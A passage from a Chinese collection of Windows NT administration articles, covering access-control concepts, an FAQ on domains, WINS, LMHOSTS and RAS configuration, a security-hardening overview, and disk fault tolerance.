    基于AccessCheck的安全性实现的一个结果是安全性严重依赖于只允许以众所周知的入口点访问安全性对象的体系结构。例如，Windows 3.1家族操作系统中的文件系统包括许多不同入口点：中断21h（与文件系统交互），中断13h（与磁盘设备驱动交互），以及几种类型的提供对文件系统访问的C运行库和Windows API函数（如OpenFile和_fopen）。从安全性观点来看，在OpenFile内部实现中调用AccessCheck这样的函数毫无用处，应用程序可以简单的调用_fopen绕过文件安全性。只有打开文件操作的所有不同调用都翻译成一个“安全性”调用才行；如果有一个执行安全性检查而另一个不执行，就会有安全性问题。

    16位Windows系统中这种“开放文件系统”结构对提供如加密软硬件的公司来说是主要的麻烦。

    在编写安全性服务器程序时，将程序设计的无懈可击是绝对必要的；也就是说，必须防止客户可以访问关键数据的所有方法。安全性系统的挑战之一是使关键数据无懈可击。这可能是一件相当复杂的工作，就象前面的例子中，单独保护注册表入口对于保护整个计算机的设备驱动程序是不够的。

    访问权限类型

    使用安全性API，系统能够帮助管制对几乎任何种类对象的访问。但“访问”的含义是什么？是不是谈论数据库字段时所使用的访问类型，还是与访问其它窗口的消息循环完全不同的某种类型？

    这就是为什么“访问”在安全性API中是一个相当普遍的术语。不是像“打开、关闭、读取和写入对象的权限”这种牢固加密的访问类型，Windows NT中的访问被定义为掩码中位的集合。安全性子系统将用户访问掩码中的位与对象访问掩码中的位进行匹配。例如，这使得我们能够设计一个员工数据库，管理员可以读写工资和奖金的信息，经理可以读但不能写，其他人不能读写访问。

    以相同的方式，应用程序能够定义自己的访问类型。例如，如果程序想保护一个可以共享（从几个用户都能够调用函数操作屏幕上对象的意义上）的OpenGL对象，可以为OpenGL对象能够完成的所有操作（如旋转、拉伸、反弹和移动）定义唯一的访问权限，并且为每个需要对图象进行操作的用户指定这些权限的唯一子集。

    安全性API能够以三组权限工作：

    标准权限（为每种对象类型提供相同操作的权限）。

    特殊权限（对每个对象类型有特殊意义的权限。两种不同类型的对象可能有相同的权限掩码位，但有对权限意义的不同翻译）。

    普通权限，概略的占位符（象GENERIC_READ和GENERIC_WRITE此类的权限，几乎适用于所有对象类型，但对不同对象类型有不同的意义）。普通权限被映射为标准权限和特殊权限。这一机制允许服务器不用实际定义操作就可以建立“读”和“写”的概念。服务器程序能够用普通权限工作，不管读写是对文件还是对数据库对象，对象自己能够确定普通权限如何翻译成特殊权限。

返回


Windows NT常见问题解答

《一键清理系统垃圾》

Windows NT常见问题解答

如何在远程启动服务器上安装远程启动服务

什么是telnet服务器？

如何使用NT服务器连接两个小型TCP/IP局域网？

如何Windows NT PDC 和 BDC 的重命名？

如何安全地更改NT域名称？

如何为域解析编制LMHOSTS文件？

如何静态地初始化PDC中WINS的0x1b记录?

如何从RAS路由IP包到网卡?

如何手工安装第二个处理器？

如何通过WINS浏览广域网?

管理员怎样取消计算机账号的自动改变?

如何使用磁盘限额?

如何在远程启动服务器上安装远程启动服务
具体安装步骤：

您必须确认已经安装DLC和NetBEUI协议。
点击开始，在设置下选择控制面板。
双击网络。
在服务选项下，选择添加…。
在网络服务清单下选择远程启动服务。
在安装远程服务对话框下，输入所要安装的完整路径名。缺省目录是 \Rpl。点击确定
点击确定．
在Windows NT 安装对话框下，键入安装程序的目录缺省目录是 \i386。
点击继续。
在以下窗口键入 \clients\rpl。
点击继续后完成安装。
返回>>>

什么是telnet服务器？
Windows NT安装程序自动给每个系统安装telnet客户(telnet.exe), 此程序可以连接到Unix的telnet服务器上，但是NT本身没有带telnet服务器，所以它不能连接到NT上。

如果需要从Unix用telnet连接到NT服务器，可以使用NT Resource Kit中telnetd.exe。它是一个后台的网络服务，具体按装步骤请参照telnet.wri。

虽然也可以用NT的telnet连接该服务器上，但是NT之间可以使用更方便的工具：remote console。此工具也来自NT的Resource Kit。操作步骤是：

先在远端启动一个command prompt，执行命令：
    remote /s "cmd" xxx

然后在用户本地执行：
    remote /c machine1 xxx

其中

xxx是连接代号，它用来区别两台机器间的多个连接。

machine1是远端计算机名。

cmd是要远程执行的命令，也可以用任何类似的字符交互程序代替。返回>>>
如何使用NT服务器连接两个小型TCP/IP局域网？

两个网段的网络地址应互不相同，否则要预先调整，称为X网段和Y网段
在一台NT服务器上安装两块网络适配器，分别连到两个网段上
在两块网络适配器上分别设置TCP/IP，使它能分别PING到两个网段上的其他机器。，设X网段上适配器的IP地址是X1，Y网段上适配器的IP地址是Y1。
在路由服务器上启用IP转发
在所有机器上设置缺省网关，X网段上机器的网关地址为X1，Y 网段上机器的网关地址为Y1——即路由服务器在本网段上的地址。
重启所有机器后，X，Y网段上的机器应能互相PING到
若原来没有设置WINS服务器，可在路由服务器上加载WINS服务；若原来两个网段都有WINS服务器，去掉一个，小型局域网上一个WINS服务器已足以应付。
在所有机器上填好WINS服务器的地址
重启所有机器后，X网段上的机器应可以按名访问Y网段上的机器。注意，WINS服务器应先于其他机器启动，所以一般是不关机的。

如何替换主域控制器

情况一：主域控制器替换成另一台机器
安装新机器为本域的备份域控制器
将新机器升级为主域控制器，原主域控制器同时降成备份域控制器
移去原主域控制器
主域控制器需要重装NT
找一台备份域控制器升级为主域控制器，原主域控制器同时降成备份域控制器
原主域控制器重新安装NT
仅使用TCP/IP的拨号网络客户如何通过RAS访问远程网络

可遵循以下配置步骤,以使仅使用TCP/IP的拨号网络客户通过RAS能够访问远程网络.

在拨号网络客户的控制面板->网络中,将拨号网络客户的工作组名或域名设置成将要连接的远程网络的工作组名或域名.
在远程网络,安装并配置WINS服务.
注: WINS服务器服务并不一定要与RAS服务器安装在同一台机器上.

在RAS服务器的控制面板->网络中,配置TCP/IP协议使其到指定的WINS服务器注册.
注: 若要远程网络中的某一机器可以被拨号网络客户浏览到,则其一定要在WINS服务器注册.

在拨号网络客户的电话号码簿中,TCP/IP缺省地配置成使用服务器指派的名字服务器.这是推荐的配置.
注: 如果需要也可以指定远程网络WINS服务器的IP地址.　　 返回>>>

如何Windows NT PDC 和 BDC 的重命名？
您可能需要重新命名一台PDC或BDC，请用以下步骤：

对PDC：

在Windows NT 3.x计算机上，进入控制面板的网络选项；在Windows NT 4.0计算机上，进入进入控制面板的网络选项，选取“标志”标签。在网络设置对话框选择计算机名称旁的“更改”按钮，键入新的计算机名称，选择“OK”。
重新启动PDC使更改生效。
在服务器管理器中，如果旧名称仍然存在或看不到新名称，进行下面工作：
建立一个新名称的记录。在服务器管理器“计算机”菜单项选取“加入域”。
新的计算机帐户建立为“备份域控制器”，显示则是PDC
选中老的计算机名称，删除。
注意：有时3a步骤可能建立两个帐户，其中一个是备份。如果这样，把备份的一个删除。

对BDC：

在服务器管理器中选择要加入新计算机名称的域，加入新计算机名。确保加入的是BDC。
在要改名的BDC上，进入控制面板的网络选项，改变计算机名称。
重新启动该了名的BDC，将发现NETLOGON服务没有启动。
在域中其它计算机上，打开服务器管理器，选择新的BDC名，并在“计算机”菜单选择“与主控制器同步”，这样可以启动NETLOGON服务。
在服务器管理器中选择旧的BDC名，并从域中删除。
改变计算机名称后在服务器管理器中看不到PDC

症状：在服务器管理器中选取“仅显示域成员”时看不到PDC，但不选取这一选项时则可以看到PDC
原因：更改了PDC的计算机名称，但没有为新的名称建立计算机账号。
解决：按照系统手册中的方法为PDC改名。
注意：手册中的第一步有误。在为PDC改名之前，请先用新名称建立一个BDC帐户，以便在改名后分配给PDC。　　　返回>>>

如何安全地更改NT域名称？
在NT中，域通常用NetBIOS名和SID标志，大多访问控制(ACLs)和其他安全特性使用SID来标志域。所以可以更换域名而不中断网络服务。

下列过程指导如何安全地更改NT域名称，适用于单域模式或单主域模式中的客户域及资源域。

在更改域名称前请注意：有一些 BackOffice产品将不能在更改名称后的域中正常运行，对这些产品，文末有附说明。

不保证您使用的第三方软件可以在更改域名称后正常运行，请联系软件供应商了解软件工作方式，并确知其能否在改名后的域中正常工作。

建议您在真正更改域名称前测试改名的后果，以保证改名后可以正常工作。更改域名的危险必须自己承担。在改名过程中，不要以新域名或旧域名安装PDC或BDC。不要提升BDC为PDC，仅在此域所有服务可以中断的情况下可以进行改名工作。所有客户必须注消直到改名完全结束，

然后重新启动所有计算机。

先对所有计算机进行完全备份再开始改名。

在改名前后分别为每台计算机建立单独的紧急修复盘。

准备好NT的CD和最新的服务包，以及NT启动盘。

可以使用NT资源包中的NETDOM来远程更改一些计算机的登录域名称，而不必接触到每一台计算机。

请按照如下步骤进行：

通知并关断所有和要改名的域相关的信任关系。保证在两方都关断信任。
停止所有的BackOffice服务，例如Exchange Server, SQL Server 和IIS，并把服务的启动方式设为手动。
改变PDC上的域名称。
重新启动PDC，使新的<1B>名称标致送入WINS服务器。
如果你正在使用WINS for NetBIOS来解析TCP/IP名称，强制复制PDC的主WINS 服务器信息到所有其它WINS服务器以转达新的<1B>名称。 PDC的名称解析正确才能使BDC成功转换到新域名。如果使用TCP/IP而没有使用WINS，则要在所有BDC上新建LMHOSTS文件包含新的域名称的记录。请参照KB中Q129218的信息。
在所有的BDC上改变域名称并重启动。BDC必须重新启动才能在WINS服务器上注册<1C>记录。
强制复制WINS服务器以转达新的名称<1B>记录。
重新建立信任关系。
在控制面板的服务工具中重新启动第二步中停止的服务。选取服务，使用“启动”按钮。把本应是自动启动的服务重新设置为自动方式。请按照正确的顺序启动服务。
对服务做必要的改动。
改变所有成员服务器和工作站上域的名称。对不支持域模式的工作站则更改工作组名称为新的域名称。
同步整个域。
问题解决：

如果改名后在BDC上发生错误，通常是名字解析或账号数据库引起的问题。首先用服务器管理器同步PDC，对于名字解析问题，确保WINS同步，或是LMHOSTS文件的正确性。
在一些批处理中你会遇到问题，因为它们仍然使用旧的域名称。你要检查所有此类文件。通常这类文件存放在PDC的NETLOGON共享目录中，或是存在于登录脚本及自动运行的工具中。
您可能在日志中发现错误，可以到http://support.microsoft.com/support上查找“event id XXXX”获取更多的相关信息。改名后发生的错误多数和名称的改变相关，例如
Network name net found 或 Error 53 一般出在计算机名称解析上，要在WINS上检查 COMPUTERNAME<00h>，COMPUTERNAME<03h>，COMPUTERNAME<20h>，并使所有WINS服务器同步；
A domain controller for this domain could not be found.或 Unable to contact the domain controller for this domain. 错误发生在域名称解析上，检查DOMAIN<1bH>，DOMAIN<1cH>记录并使所有WINS服务器同步；
The trust relationship failed. 一般是由于信任关系没有重建，或是计算机账号无效，应重建信任关系或计算机账号，并将计算机重新添加到域中。
改变域名称可能引起的影响：

服务管理器的数据库中服务账号存为文本而非SID，因此所有计算机上使用域用户账号作为服务账号的服务必须手动进行调整。 NT资源包中的SC.EXE工具可以帮助进行远程更改。
当你在SQL Server上使用安全措施时，必须在安全管理器中重新设置“默认域”，并且如果用户不在默认域中，必须删除后再添加改名后的域中的用户和组，本地组中包含的改名后域中的用户和组也必须删除后再添加。
Exchange服务账号必须以新域名重新建立，并且要在Exchange管理程序组中选取工具--选项，选取权限标签，改变默认域名称。
所有Exchange Server的公共文件夹的安全信息将丢失。重命名前请使用命令行工具PFADMIN.EXE将安全信息保存到一个文本文件中，以使重建工作简便。这个工具可以在微软的网站上作为Exchange Server资源包下载。
如果域中有SMS的主点或备份点，SMS必须卸载后重新安装，而且无法恢复SMS数据库。
如果域是SMS站的一部分，但不包括主点或备份点(仅包含登录服务器和客户)，此域必须在改名前从SMS站中删除，改名后重新加入。请参照SMS安装配置手册。
如果运行IIS，必须改变账号的虚拟路径。　　　返回>>>
如何为域解析编制LMHOSTS文件？
当您在TCP/IP网络上解析名称时会有延迟，并且必须使用LMHOSTS文件查找NetBIOS名称。此文讨论了如何建立一个LMHOSTS文件进行名称解析和域??
通过以下步骤建立正确格式的LMHOSTS文件:

使用文本编辑器建立一个名为LMHOSTS的文件,存放位置为:
    对Windows NT为 %SystemRoot%\System32\Drivers\etc
    对Windows 95为 c:\Windows(Windows的安装路径)
注意:文件名称为LMHOSTS,没有扩展名.使用记事本编辑此文件时会自动添加.TXT扩展名。如果这样，必须在命令行方式下手工更名。

在LMHOSTS文件中加上下列句:
    10.0.0.1 PDCName #PRE #DOM:Domain
    10.0.0.1 "Domain \0x1b" #PRE
注意:句中的空格不可省略。将10.0.0.1替换成自己的PDC的地址,PDCName替换成您的PDC的NetBIOS名,Domain替换成您的NT域名称。引号中必须有总共20个字符(域名称连同空格共15个字符，反斜杠在第16个字符)

加入上述行后，保存此文件。

在命令行方式下键入以下命令：
    NBTSTAT -R
注意:-R参数是大小写敏感的，您必须使用大写.命令键入后您可以看到如下信息:
    Successful purge and preload of the NBT Remote Cache Name Table.

键入以下命令:
    NBTSTAT -c
注意:-c参数也是大小写敏感的，必须使用小写。命令键入后您会得到类似下面的显示:
Node IpAddress: [157.60.69.82] Scope Id: []
NetBIOS Remote Cache Name Table

Name Type Host Address Life [sec]
------------------------------------------------------------
PDC1 <03> UNIQUE 100.0.0.2 -1
PDC1 <00> UNIQUE 100.0.0.2 -1
PDC1 <20> UNIQUE 100.0.0.2　　　　　　　　　　　　　　返回>>>

如何静态地初始化PDC中WINS的0x1b记录?
如果一个PDC不是Windows NT Server 3.5, 3.51, 4.0(例如Windows NT Advanced Server 3.1或LAN Manager Server),你必须在这个PDC上用0x1b名称静态地初始化WINS.地址应当为此PDC的IP地址。如果这台PDC没有用0x1b名称静态地初始化,它将注册为十六进制的0x00h,0x03h或0x20h.
您可以建立一个LMHOSTS文件向WINS添加特定的静态名称和地址。LMHOSTS文件的格式为:

<IP address><SPACE>"<DOMAIN Name> \0x1b"<SPACE>#PRE<CR><LF>

例如:

130.20.37.30 "MYNTDOMAIN \0x1b" #PRE

注意:PDC的计算机名限制在15个字符。十六进制的1b加在计算机名之后从第十六个字符开始(总唱20个字符).<space>表示此处可以有一个或多个空格用于分割项目.确保每行之后敲回车,包括文件最后一行也要敲回车.

注意:输入的LMHOSTS文件必须遵循8.3文件名转换,否则将不起作用。文件名不必是LMHOSTS,但是必须有扩展名(例如static.dom).
通常PDC和域主浏览器是同一台机器。0x1b是域主浏览器的名称，客户浏览器使用这个名称联系域主浏览器。当WINS要查找这台域主浏览器时,将返回地址。WINS认为注册了1B名称的计算机是PDC.

当一台客户计算机发布广播寻找<DOMAIN_Name>[00h]以解析本地网络时,将得到一个域名称(用于定位域主浏览器<DOMAIN_Name>[1bh]或域控制器<DOMAIN_Name>[1ch]).此时,如果得到域主浏览器则可以确认,如果不是，将继续请求直到一个域控制器响应。此处不一定要使用0x1B名称，因为PDC注册为 1C名称(一个互连网组).但是为了加快客户计算机查找　　PDC并提高网络性能，请使用1B名称。　　　　　　　　返回>>>
如何从RAS路由IP包到网卡?
Windows NT 3.5资源包的网络手册419到421页和知识库中以下文档解释了如何用TCP/IP协议配置远程连接服务充当简单的路由器：Q121877

路由发生在RAS连接和局域网的网卡之间。如果发生下列情况，所有的包将发送给RAS连接。

RAS连接和网卡使用同一网络的不同的子网地址。
选中RAS的“在远程网络上使用默认网关”选项。
此文介绍如何将包发送到网卡。

请按照下列步骤修改注册表： (警告!!不当使用注册表编辑器将造成错误，甚至可能必须重新安装系统。您必须自己负责可能的危险后果。)

启动注册表编辑器，找到下述子键： HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\PPP\IPCP
添加值
Value Name:PriorityBasedOnSbuNetwork
Data Type: REG_DWORD
String: 1(Enable)
推出注册表编辑器
在命令行方式运行以下命令：
net stop remoteaccess
net start remoteaccess
用于重新启动远程连接服务使修改生效。　　　 返回>>>

如何手工安装第二个处理器？
步骤：

建立应急维修盘或升级已有的应急维修盘
新安装一份NT，注意装到不同目录或分区以便不影响原有系统(新安装一份系统的目的是用于复制关键文件。因为无法覆盖当前系统的核心文件。)
启动到新安装的NT
将以下几个文件改名保存：
原来系统目录下的
NTOSKRNL.EXE
HAL.DLL
KERNEL32.DLL
NTDLL.DLL
WINSRV.DLL

如果是NT 4.0还要保存

WIN32K.SYS

系统目录指 %systemroot%\system32\ 目录，通常是 winnt\system32\ 目录。
改名保存的目的是今后可以恢复到单处理器的系统

根据所使用的机器选择硬件层文件：
Halast.dll = "AST Manhattan SMP"
Halsp.dll = "Compaq SystemPro Multiprocessor or 100% Compatible"
Halcbus.dll = "Corollary C-bus Architecture"
Halmca.dll = "IBM PS/2 or other Micro Channel-based PC"
halmpsm.dll = "Micro Channel Multi Processor PC"
Halapic.dll = "MPS Uniprocessor PC"
Halmps.dll = "MPS Multiprocessor PC"
Halncr.dll = "NCR System 3000 Model 3360/3450/3550"
Haloli.dll = "Olivetti LSX5030/40"
Hal.dll = "Standard PC" (single processor HAL)
Hal486c.dll = "Standard PC with C-Step i486"
Halwyse7.dll = "Wyse Series 7000i Model 740MP/760MP"

用合适的文件替换原系统目录下的 HAL.DLL 文件，如果不能确定使用哪个文件，请询问硬件厂商
复制 CDROM 上的以下文件到原系统目录：
NTKRNLMP.EXE 到系统目录的 NTOSKRNL.EXE
NTDLL.DLL 到系统目录下

解压以下文件到原系统目录：
KERNEL32.DLL
WINSRV.DLL

如果是NT 4.0 还要解压 WIN32K.SYS
请使用NT下的 expand.exe 工具来解压

重新启动原系统，注意启动时出现“Multiprocessor kernel”，表示第二个处理器安装成功
附注：

如果安装过 Service Packs，请从 Service Packs 的 CDROM 上复制或解压上述文件，否则请依据附注 C 修改 Setup.log 文件后重新安装 Service Packs。
如果安装过 Proxy 2.0，还需要替换驱动程序目录下的 IPFLTDRV.SYS 为多处理器版：
CDROM 中 \msproxy\i386\routing\up\ipfltdrv.sys 36KB 为单处理器版本，
\msproxy\i386\routing\ipfltdrv.sys 34KB 为多处理器版本。
请将合适的文件复制到 %systemroot%\system32\drivers\ 下。
手工安装后，再安装 Service Packs，启动后将报告为单处理器，这是因为 Service Packs 从 Setup.log 中读取信息安装相应文件。为了今后安装或升级方便，需要修改 Setup.log 文件：
去除 %systemroot%\repair\Setup.log 的只读和隐含属性.
用记事本打开此文件，查找并修改 [Files.WinNt] 段中的以下行（以 NT 4.0为例）：

并注意根据自己机器的配置，更改为不同的硬件层文件（文件列表在步骤 5 中有述），如：

在 NT 资源包中可以找到 UPTOMP.EXE 工具，可以自动将系统升级为多处理器系统，但这已不属于本文讨论（手工升级）的范围。　　　　　返回>>>
如何通过WINS浏览广域网?
Windows NT 3.1 的浏览(WINS的前身)
在Windows　NT 3.1中,浏览信息几乎全部是通过网络广播传送的。在广域网上典型的域的划分是通过路由实现的。为了减少带宽的占用，通常广播包是被过滤掉，无法通过路由，被限制在本子网内。

这样的结果是,NT 3.1默认使用的B结点名字解析无法解析其他子网内的名字。每个子网形成了一个浏览无关的区域,其中有自己的主浏览器和后备浏览器。浏览器的选举也是基于单个子网的。

Windows NT Advanced Server 3.1 支持跨子网浏览。为了浏览广域网的资源，每个子网至少要有一台Windows NT Advanced Server.域主浏览器 保存了一份域中和其他可访问的域中可用服务浏览列表。
当一个域包含多个子网时,每个子网的主浏览器通过直接发送数据包"MasterBrowserAnnouncement"向域主浏览器宣布自己的存在。域主浏览器向这个子网的主浏览器发送"NetServerEnum"请求，宣布自己的存在并搜集这个子网的服务列表。域主浏览器把从这个子网得到的服务列表合并到自己的服务列表中。这个过程每15分钟重复一次，以确保域主浏览器存有域中服务的完整的列表。

于是,当一个客户向主浏览器发送一个"NetServerEnum"请求时,主浏览器能够返回域中所有的服务，而不管这些服务在哪个子网中。

注意:一个工作组不能分布于多个子网段.当一个工作组分布于两个以上网段中时,将成为独立的多个工作组。

为确保每个子网的主浏览器能够访问每个域的域主控制器，主浏览器必须含有LMHOSTS文件,其中通过#DOM扩展语句包含所有域的PDC和BDC的名称。要保证每个PDC可以通过每个子网的主浏览器访问那个子网的浏览列表，TCP/IP(或其他广域网协议)必须首先缓存那个子网的主浏览器的客户地址。

Windows NT Server 3.5 及之后的版本通过WINS浏览
Windows NT Server 3.5 及之后的版本包含WINS服务.WINS是用于关联NetBIOS名称和IP地址的服务。
域主浏览器向WINS服务器注册一个统一的浏览名称" [1b]".其他域主浏览器将定期查询WINS服务器以得到域列表,它们就可以将这个列表合并到它们的本地浏览列表中,受到查询时再发送这个列表给每个子网的主浏览器。

域主浏览器分两步查询WINS服务器:

浏览器查找所有以[1B]结尾的域名.
然后浏览器对所有名称进行反向查询以便获取那个域的域主浏览器的统一名称.
接下来的请求中，域主浏览器用以上方式继续搜集服务列表和域名称。

注意:只有支持WINS的域主浏览器(Windows NT 3.5 及之后的版本)能够向WINS服务器注册 [1b]名称.Windows NT 3.1的域主浏览器不会使用WINS.

Windows NT Workstation 3.5 及之后的版本支持WINS
Windows NT Workstation 3.5 及之后的版本发送"NetServerEnum"请求给所在域的后备浏览器.得到的是包括由WINS提供的域主浏览器的域列表。当工作站浏览远程域时,它向WINS服务器查询注册为 [1b]名称的计算机的IP地址。然后工作站向这个IP地址发送"GetBackupListReq"请求并且从回应信息中选择一个计算机名,再向这个计算机名发送"NetServerEnum"请求以获取那个域中的计算机的列表。

Windows NT 3.1客户不支持WINS
当Windows NT 3.1客户浏览远程域时,它发送"GetBackupListReq"信息给 [1d],而不是 [1b].由于这个子网中没有域主浏览器,客户机将放弃,转而向本地的域主浏览器提出请求。浏览器将代替客户机提交NetServerEnum API.结果则依赖于浏览器服务器是否支持WINS.

Windows for Workgroups 3.11客户使用TCP/IP-32 支持WINS
Windows for Workgroups 3.11客户可以通过TCP/IP-32 for Windows for Workgroups支持WINS.WINS可以在单独的工作站连接上工作。然而，它们所使用的浏览器代码不支持WINS和广域网.当Windows for Workgroups客户在一个有Windows NT 3.5或之后的版本的浏览服务器的本地域时,客户可以看到所有远程域的列表。但是当客户选择了其中一个名称时,将不能解析这个名字，因为客户无法识别[1b]名称。　　　 返回>>>

管理员怎样取消计算机账号的自动改变?
作为NT安全性的一部分， 计算机的账号每七个星期将改变一次。

在下述情况下你需要取消计算机的账号的自动变更：

你希望减少网络复制的发生频率。 作为计算机的账号自动变更的一个负面影响， 一个有着大量计算机和域控制器的域将产生大量的复制工作。取消计算机账号的自动改变将减少网络复制流量。
你在同一台双重及启动的计算机上装有两个不同的NT操作系统。 在这种情况下， 如你想在两个不同的NT间共享机器的账号， 唯一的办法是在加入域之前取消计算机账号的自动改变。
你需要经常重装NT， 又不希望经常让域管理员为你创建计算机账号
注意：取消计算机账号的自动改变， 意味着你将放弃一些NT提供的安全性

操作步骤：

取消计算机账号的自动改变，你可以将注册标中的
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\
Parameters下的DisablePasswordChange字段的值改为1

或是将域控制器的注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\
Parameters下的RefusePasswordChange字段值改为1， 这样便无需对工作站的注册表进行改变

注意：该域控制器的顺序应该是先改所有的BDC, 最后改PDC　　　　　　　　　　　返回>>>

如何使用磁盘限额?
磁盘限额跟踪并且管理磁盘空间的使用情况。 管理员能够做到：

当用户超过一定的磁盘使用限额时，能够阻止磁盘的空间进一步的被该用户使用， 并且在日之中纪录该情况
当用户的磁盘使用量超过一定的限额后， 会在日志文件中发出警告
当你使用磁盘限额时， 你可以设定两个值：

允许使用的磁盘限额
需要发出警告时的磁盘限额
设置缺省的限额值：

打开我的电脑
双击要分配限额的卷的卷标， 并选择"属性"
在属性对话框中， 选择 "限额" 页
选择 "允许使用限额管理" 按钮
选择 "限制磁盘空间至"按钮， 这将激活"限制额" 和 "警告额" 字段
在文本框中输入想要的限额及单位
增加新的限额项：

打开我的电脑
双击要分配限额的卷的卷标， 并选择"属性"
在属性对话框中， 选择 "限额" 页
单击"限额项" 按钮
进入 "限额项" 窗口后， 选择"新限额项" 菜单条
选择需要进行限额的用户， 设定他/她的限额量
注意： 如果你使用的不是NTFS5.0 版 或是你没有管理员权限， 在你的 "卷属性" 对话框中将不出现 "限额" 页　　　　　　　　　　　　　　　　　　　　　　　　 返回>>>

怎样重定向"我的文档"？
重定向"我的文档"的好处：

用户在网上无论使用哪一台计算机， 他/她的"我的文档" 文件夹始终可见且相同
即使他/她暂时不与网络相连， 他/她仍可以使用"我的文档"文件夹， 这对笔记本电脑的用户格外重要
当该用户使用roaming user profiles时， 只有"我的文档"的路径被记录在profile中，而不是"文档" 本身。 这避免了"文档"中的内容在网上来回传输， 缩短了用户的登录时间
统一放置在服务器上的文档可进行统一的备份， 增加了安全性
用重定向的方式管理员可以利用"用户空间限额" 控制每个用户的"我的文档" 的大小
文件夹的内容可被重定向到本地机另一非系统盘上， 这样当系统需要重装时无需备份个人数据
返回>>>

返回


Windows NT的安全机制浅析

《一键清理系统垃圾》

Windows NT的安全机制浅析

    如今，Internet上采用Windows NT Server作为服务器操作系统的网站越来越多，同时，很多企业采用NT平台作为其Intranet解决方案的基石。Windows NT具有典型的Windows操作界面，简单易用。然而简单和安全是互相矛盾的两个因素，简单就不安全，安全可能就不简单。安全和稳定又是相互联系的，不安全的系统，其稳定性也直接受到影响。随着Internet开放性的发展，网上信息的泄露和篡改，黑客入侵，病毒传播等经常发生，这使Windows NT的安全问题更加值得关注。

    口令安全

    Windows NT口令的安全性比UNIX要脆弱得多，这是由其采用的数据库存储和加密机制所直接导致的。NT4.0将用户信息和加密口令保存在注册表中的SAM(安全帐户管理)文件中。口令的加密名义上分两层进行，实际上只有一层。第一层用RSA MD4系统对口令进行加密，第二层却不采取任何附加措施，因此缺乏基本的口令复杂性，形同虚设。用PW Dump或NT Crack之类的解密工具即可解码SAM数据库并破解口令。

    口令是对系统的最大安全威胁，口令被盗意味着用户在这台机器上的一切信息将全部丧失。为加强NT口令的安全性，首先需要安装SP3以上的补丁，根据使用经验，SP5效果较好些，SP4和SP6的稳定性和可靠性都不及SP5。但SP3以上的补丁对NT口令都有所加强；其次改变管理员帐户的名字，防止黑客攻击缺省命名的帐户，并使用更安全的口令。安全的口令应该大小写字母混合（注意只有一个大写字母时，不要放在开头或结尾），8位以上字符，将数字无序地加在字母中，系统用户的口令包含～!@＃＄等符号。另外设置跟踪管理员帐户，几次登录失败后即锁定帐户等。

    文件系统安全

    Windows NT支持两种文件系统：FAT和NTFS。二者的区别在于NTFS是针对500M以上容量的硬盘驱动器设计的，支持文件和目录访问权限的设置，适用于存储应用程序和用户文件，而FAT对500M以下容量的硬盘进行了优化，且不支持文件和目录访问权限的设置。

    Windows NT的安全机制是以用户为核心的，试图访问受保护对象的每一行代码，该用户必须用口令向客户机证明自己的身份，每次安全性检查都要依靠用户鉴别。文件和目录可以有两种许可权限：共享许可权（Share Permissions）和文件许可权（File Permissions）。共享许可权用于用户远程访问共享文件系统，当用户试图以共享方式访问文件时，系统会检查用户是否拥有访问权限。文件许可权是直接分配给文件和目录的访问权限，无论用户使用何种方式访问文件系统都起作用，需要将用户或工作组与特定的访问级别相联系。另外通过文件的属性可设置文件许可权、文件审核和文件所有者。

    对文件权限的错误设置有可能带来安全上的问题，在复制或移动文件时，其权限设置会发生改变，如文件复制到一个目录下，它会继承该目录的权限，而移动文件时，无论移动到哪个目录下，它会保留原来的权限设置。因此需要经常检查文件的权限设置，尤其在文件被复制或移动之后。缺省的权限设置允许所有人改变关键目录的访问权，如NTFS卷的根目录，System32目录等，可以将这些关键目录的权限改为只读。另外可以通过FTP进行无授权的文件访问，要合理配置FTP服务器，确保服务器必须验证所有FTP申请。

    Web服务器安全

    IIS (Internet Information Server)集成了多种Internet服务如WWW服务，FTP服务，Gopher服务等，利用它和Windows NT Server密切配合，可以方便地构造Web站点。IIS中存在许多弱点，在缺省情况下，安装IIS会生成InetPub目录，其中又含有四个子目录。其中三个子目录是三种Internet服务器的根目录，用于存放三种服务的所有文件和目录，另外有一个目录用于文本存储，使用CGI，Visual Basic或Perl开发的WEB应用程序可以存储在此目录下。管理员应定时检查IIS的目录结构，并设置适当的许可权限。

    与IIS流行的同时，ASP也成为系统程序员用来作网络管理编程的偏爱。ASP的开发和维护都比较简单，而且具有强大的功能，但存在一些安全方面的漏洞。在IIS3.0的时候就曾发现，在ASP程序后面加某字符串可以看到ASP的源代码。由于ASP的源代码中含有数据库的访问口令等关键数据，因此这直接影响到Web服务器的安全。

    同IIS3.0比较，IIS4.0的安全性已经有很大的改进，例如其FTP帐户不是开在域内，而是在本机上。如果要作FTP服务器，用IIS本身所带的FTP比较好，据统计其安全性要高于其他FTP服务器端软件。另外要注意的是，一定要保证安装了所有可靠的安全补丁。

    NTFS分区安全

    如果在同一台主机上存在多种操作系统如DOS，Windows，Linux，就有可能通过访问其它操作系统，绕开NTFS本身的安全设置。有些工具可以不需要授权即访问Intel系统上的NTFS格式的硬盘驱动器，从而操纵NT的各种安全设置。如DOS/Windows的NTFS文件系统重定向器，Linux NTFS Reader，SAMBA等。在这种情况下就要使用专门的分区，并限制系统管理员组和备份操作员组，同时限制管理员使用的操作程序，禁止此类跨越操作系统的访问。

    总的说来，Windows NT的安全性有一定的保障，其安全方面的漏洞基本上都被SP补上，同时它不大容易通过远程管理被修改，但需要用户按照程序对缺省配置进行修改，而且系统管理员通过细微而谨慎的工作，才能获得一个安全而稳定的网络操作环境。

返回


Windows NT环境下的系统容错技术

《一键清理系统垃圾》

Windows NT环境下的系统容错技术

     容错是为使数据避免遭受意外损坏而采取的一种保护措施。保护数据的方式有许多，以下介绍的是Windows NT所提供的两种容错方式，它非常适合于一般网络用户使用。
     1.带奇偶校验的带区集的使用
     带奇偶校验的带区集是在带区集的基础上增加了系统容错的功能。建立带奇偶校验带区集的方法与建立带区集的方法基本相同。
    ●先选定第一个可用空间，按住Ctrl键不放，而后各选取其它硬盘上的一个大小相当的可用空间。
    ●选择“容错”菜单中的“创建带奇偶校验的带区集”选项，之后执行“磁盘分区”菜单中的“立即更改”功能，并经“格式化”后建立成功。
     详细操作可参看前文建立带区集的相关步骤。与带区集一样，带奇偶校验的带区集也同时支持FAT和NTFS两种文件系统，至少需要三个硬盘才能进行，最多可达到32个。
